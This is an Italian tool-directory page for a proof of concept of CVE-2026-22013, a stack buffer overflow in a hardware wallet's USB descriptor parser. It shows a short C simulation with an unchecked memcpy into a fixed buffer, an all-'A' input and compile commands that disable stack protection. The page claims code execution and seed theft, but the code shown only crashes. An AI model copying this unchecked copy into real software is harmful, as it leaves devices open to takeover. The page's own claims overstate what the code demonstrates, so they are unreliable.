Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-22013-Hardware-Wallet-USB-Descriptor-Buffer-Overflow — PoC di buffer overflow dello stack per il parser dei descrittori USB di hardware wallet (CVE-2026-22013), che mostra la sovrascrittura dell'indirizzo di ritorno e l'esecuzione di codice tramite un payload GET_DESCRIPTOR di dimensioni eccessive. | Kitploit
Strumenti/GitHubGitHub/george0papasotiriou/cve-2026-22013-hardware-wallet-usb-descriptor-buffer-overflow
Sicurezza Sistemi EmbeddedAnalisi delle VulnerabilitàExploitHacking HardwareSicurezza HardwareBinary Exploitation
GitHubgeorge0papasotiriou/cve-2026-22013-hardware-wallet-usb-descriptor-buffer-overflow

CVE-2026-22013-Hardware-Wallet-USB-Descriptor-Buffer-Overflow

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoC di buffer overflow dello stack per il parser dei descrittori USB di hardware wallet (CVE-2026-22013), che mostra la sovrascrittura dell'indirizzo di ritorno e l'esecuzione di codice tramite un payload GET_DESCRIPTOR di dimensioni eccessive.

Vedi Repository
41 mese faNon ancora revisionato

CVE-2026-22013 – Overflow del buffer del descrittore USB del portafoglio hardware

Codice del programma (simulazione firmware C)

root@kitploit:~
// hw_wallet_usb.c - USB descriptor parsing with fixed buffer
#include <string.h>
void handle_usb_setup(char *data, int len) {
    char descriptor[32];
    if (len > 0 && data[0] == 0x06) { // GET_DESCRIPTOR
        // Copy descriptor payload without bounds check
        memcpy(descriptor, data+1, len-1);  // overflow if len>33
    }
}
int main() {
    char malicious[64];
    memset(malicious, 'A', 63);
    malicious[0] = 0x06;
    handle_usb_setup(malicious, 64);
    return 0;
}

CVE-2026-22013 – Overflow del buffer del descrittore USB del portafoglio hardware

Severity: Critical

Panoramica

Lo stack USB di un portafoglio hardware presenta un buffer overflow dello stack durante l'analisi di una richiesta GET_DESCRIPTOR con un payload sovradimensionato. Un attaccante con accesso USB fisico può sfruttare questa vulnerabilità per sovrascrivere l'indirizzo di ritorno e ottenere l'esecuzione di codice, estraendo le frasi seed.

Dettagli della vulnerabilità

  • Tipo: Stack Buffer Overflow
  • Impatto: Compromissione completa del dispositivo, estrazione delle seed.
  • Causa principale: Il campo della lunghezza del descrittore non viene convalidato prima della copia in un buffer a dimensione fissa.

Dimostrazione dell'exploit

Compila per l'architettura di destinazione ed esegui (simulazione):

root@kitploit:~
gcc -o hw_wallet_usb hw_wallet_usb.c -fno-stack-protector
./hw_wallet_usb

Il programma va in crash a causa della corruzione dello stack.

Scarica lo strumento